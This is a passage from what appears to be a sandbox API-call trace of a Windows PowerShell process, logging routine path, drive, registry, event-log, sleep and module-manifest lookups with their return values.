ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0x865407b, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0184.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x7c2f3cc) returned 1 [0184.051] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0184.051] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0184.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.058] PathIsNetworkPathW (pszPath="C:\\") returned 0 [0184.059] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0184.060] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x323c478, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0184.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.060] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0184.378] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0184.381] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5450d10*="FileSystem", lpRawData=0x5450c38) returned 1 [0184.386] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5452ef8*="Function", lpRawData=0x5452e20) returned 1 [0184.439] ReportEventW (hEventLog=0x7450004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x5456fb8*="Variable", lpRawData=0x5456ee0) returned 1 [0184.443] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.702] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.705] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.707] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.713] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.760] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.807] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.947] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0184.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.041] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.150] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.212] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.380] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.416] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.462] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.601] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0185.697] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.045] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.182] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.429] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.517] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.610] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.673] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.837] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0190.979] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.053] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.121] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.168] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.444] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.743] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.868] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0191.993] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.258] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.530] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0192.899] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.274] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.461] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.759] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0193.899] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.024] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.273] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.791] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0194.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.040] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.727] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0195.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.058] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0196.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0197.953] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.464] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.575] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.652] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.714] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.792] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0198.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.224] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.473] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0199.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0200.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.063] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.157] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.254] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.407] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.580] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.704] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.928] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0201.971] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.048] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.127] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.208] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.288] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.454] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.590] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.760] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.821] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0202.963] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.038] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.046] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.047] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.056] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.076] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.088] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.090] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.092] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.093] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.094] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.096] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.097] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.098] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.121] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.122] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.122] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.125] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.130] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.135] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.139] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.140] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.150] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.151] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.151] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0203.202] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.185] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.275] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.369] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.528] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.635] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.728] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0220.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.034] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.145] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.192] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.315] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.409] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.503] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0221.596] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.400] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.903] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0223.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.070] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.257] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.351] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.625] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.742] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0224.970] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.054] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.132] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.226] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.320] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.414] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.514] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.554] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.664] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.710] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.900] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0225.945] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.025] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.172] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.316] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.363] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.385] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.526] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.586] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.657] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.692] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.709] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.725] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.740] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.756] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.757] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.787] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.788] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.796] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.833] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.834] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.839] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0226.841] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0228.670] QueryUnbiasedInterruptTime (in: UnbiasedTime=0x7c2f6f8 | out: UnbiasedTime=0x7c2f6f8) returned 1 [0228.675] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1")) returned 0x20 [0228.676] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PnpDevice\\PnpDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pnpdevice\\pnpdevice.psd1")) returned 0x20 [0229.004] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\VpnClient\\VpnClient.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\vpnclient\\vpnclient.psd1")) returned 0x20 [0230.070] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSScheduledJob\\PSScheduledJob.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psscheduledjob\\psscheduledjob.psd1")) returned 0x20 [0230.071] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSDesiredStateConfiguration\\PSDesiredStateConfiguration.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psdesiredstateconfiguration\\psdesiredstateconfiguration.psd1")) returned 0x20 [0230.184] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\WindowsErrorReporting\\WindowsErrorReporting.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\windowserrorreporting\\windowserrorreporting.psd1")) returned 0x20 [0230.206] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1")) returned 0x20 [0230.208] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1")) returned 0x20 [0230.211] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1")) returned 0x20 [0230.416] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1")) returned 0x20 [0230.417] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psd1")) returned 0x20 [0230.417] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache\\BranchCache.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\branchcache\\branchcache.psd1")) returned 0x20 [0230.640] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1")) returned 0x20 [0230.641] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\Storage\\Storage.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\storage\\storage.psd1")) returned 0x20 [0230.655] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1")) returned 0x20 [0230.656] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1")) returned 0x20 [0230.796] GetFileAttributesW (lpFileName="C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1")) returned 0x20 [0231.793] CoGetContextToken (in: pToken=0x7c2f224 | out: pToken=0x7c2f224) returned 0x0 [0231.793] IUnknown:QueryInterface (in: This=0x320a788, riid=0x73ae5e8c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x7c2f248 | out: ppvObject=0x7c2f248*=0x320a794) returned 0x0 [0231.793] IComThreadingInfo:GetCurrentThreadType (in: This=0x320a794, pThreadType=0x7c2f274 | out: pThreadType=0x7c2f274*=0) returned 0x0 [0231.793] IUnknown:Release (This=0x320a794) returned 0x0 [0233.932] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 35 os_tid = 0xf98 Thread: id = 36 os_tid = 0x12e8 Thread: id = 37 os_tid = 0x1304 [0183.686] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0183.699] CoGetContextToken (in: pToken=0x7daf554 | out: pToken=0x7daf554) returned 0x0 [0183.699] CObjectContext::QueryInterface () returned 0x0 [0183.699] CObjectContext::GetCurrentThreadType () returned 0x0 [0183.699] Release () returned 0x0 [0183.699] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0183.699] CoUninitialize () [0183.699] RoInitialize () returned 0x1 [0183.699] RoUninitialize () returned 0x0 [0183.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x7daef68 | out: phkResult=0x7daef68*=0x690) returned 0x0 [0183.816] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x7daef88, lpData=0x0, lpcbData=0x7daef84*=0x0 | out: lpType=0x7daef88*=0x1, lpData=0x0, lpcbData=0x7daef84*=0x56) returned 0x0 [0183.816] RegQueryValueExW (in: hKey=0x690, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x7daef88, lpData=0x5440074, lpcbData=0x7daef84*=0x56 | out: lpType=0x7daef88*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x7daef84*=0x56) returned 0x0 [0183.816] RegCloseKey (hKey=0x690) returned 0x0 [0183.823] CoCreateGuid (in: pguid=0x7daef10 | out: pguid=0x7daef10*(Data1=0x3beda969, Data2=0x8f74, Data3=0x4782, Data4=([0]=0x80, [1]=0xc4, [2]=0x58, [3]=0x18, [4]=0x2c, [5]=0x0, [6]=0x66, [7]=0x63))) returned 0x0 [0183.823] CoCreateGuid (in: pguid=0x7daef10 | out: pguid=0x7daef10*(Data1=0x675e9f73, Data2=0x61b, Data3=0x425b, Data4=([0]=0x96, [1]=0x1b, [2]=0xc4, [3]=0x23, [4]=0x1c, [5]=0xeb, [6]=0xcd, [7]=0x1))) returned 0x0 [0183.823] CoCreateGuid (in: pguid=0x7daef10 | out: pguid=0x7daef10*(Data1=0xd3450d36, Data2=0x874b, Data3=0x4652, Data4=([0]=0xa5, [1]=0xa6, [2]=0xaf, [3]=0xd3, [4]=0x63, [5]=0xb9, [6]=0x51, [7]=0x5c))) returned 0x0 [0183.823] CoCreateGuid (in: pguid=0x7daef10 | out: pguid=0x7daef10*(Data1=0x797c314c, Data2=0xb334, Data3=0x46af, Data4=([0]=0x9e, [1]=0x4f, [2]=0xa7, [3]=0x1, [4]=0x48, [5]=0x7, 